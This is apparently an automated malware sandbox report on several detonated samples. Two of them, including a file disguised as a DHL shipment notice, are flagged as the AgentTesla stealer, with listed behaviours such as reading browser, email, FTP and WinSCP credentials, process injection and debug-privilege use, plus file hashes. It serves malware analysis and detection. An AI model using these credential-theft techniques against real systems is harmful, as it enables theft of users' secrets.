2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
94s
Max time network
150s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\systeminfo.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\systeminfo.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\systeminfo.exe
"C:\Users\Admin\AppData\Local\Temp\systeminfo.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 25.14.97.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 21.236.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral23
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
95s
Max time network
130s
Command Line
Signatures
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\wecutil.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\wecutil.exe
"C:\Users\Admin\AppData\Local\Temp\wecutil.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 106.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 76.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 53.210.109.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 15.164.165.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 212.20.149.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win10v2004-20241007-en
Max time kernel
139s
Max time network
141s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Reads WinSCP keys stored on the system
Reads data files stored by FTP clients
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Unsecured Credentials: Credentials In Files
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3056 set thread context of 3448 | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"
C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe
"C:\Users\Admin\AppData\Local\Temp\DHL SHIPMENT NOTIFICATION 284748395PD.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 103.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 28.118.140.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 56.163.245.4.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 232.168.11.51.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 0.205.248.87.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 71.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 43.229.111.52.in-addr.arpa | udp |
Files
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\DHL SHIPMENT NOTIFICATION 284748395PD.exe.log
| MD5 | 8ec831f3e3a3f77e4a7b9cd32b48384c |
| SHA1 | d83f09fd87c5bd86e045873c231c14836e76a05c |
| SHA256 | 7667e538030e3f8ce2886e47a01af24cb0ea70528b1e821c5d8832c5076cb982 |
| SHA512 | 26bffa2406b66368bd412bf25869a792631455645992cdcade2dbc13a2e56fb546414a6a9223b94c96c38d89187add6678d4779a88b38b0c9e36be8527b213c3 |
Analysis: behavioral9
Detonation Overview
Submitted
2024-11-21 20:24
Reported
2024-11-21 20:26
Platform
win7-20240903-en
Max time kernel
128s
Max time network
121s
Command Line
Signatures
AgentTesla
Agenttesla family
AgentTesla payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Reads user/profile data of local email clients
Reads user/profile data of web browsers
Accesses Microsoft Outlook profiles
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 1812 set thread context of 764 | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe |
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Suspicious use of WriteProcessMemory
outlook_office_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
outlook_win_path
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\USER\S-1-5-21-3533259084-2542256011-65585152-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 | C:\Users\Admin\AppData\Local\Temp\EZ0496.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\EZ0496.exe
"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"
C:\Users\Admin\AppData\Local\Temp\EZ0496.exe
"C:\Users\Admin\AppData\Local\Temp\EZ0496.exe"
Network
Files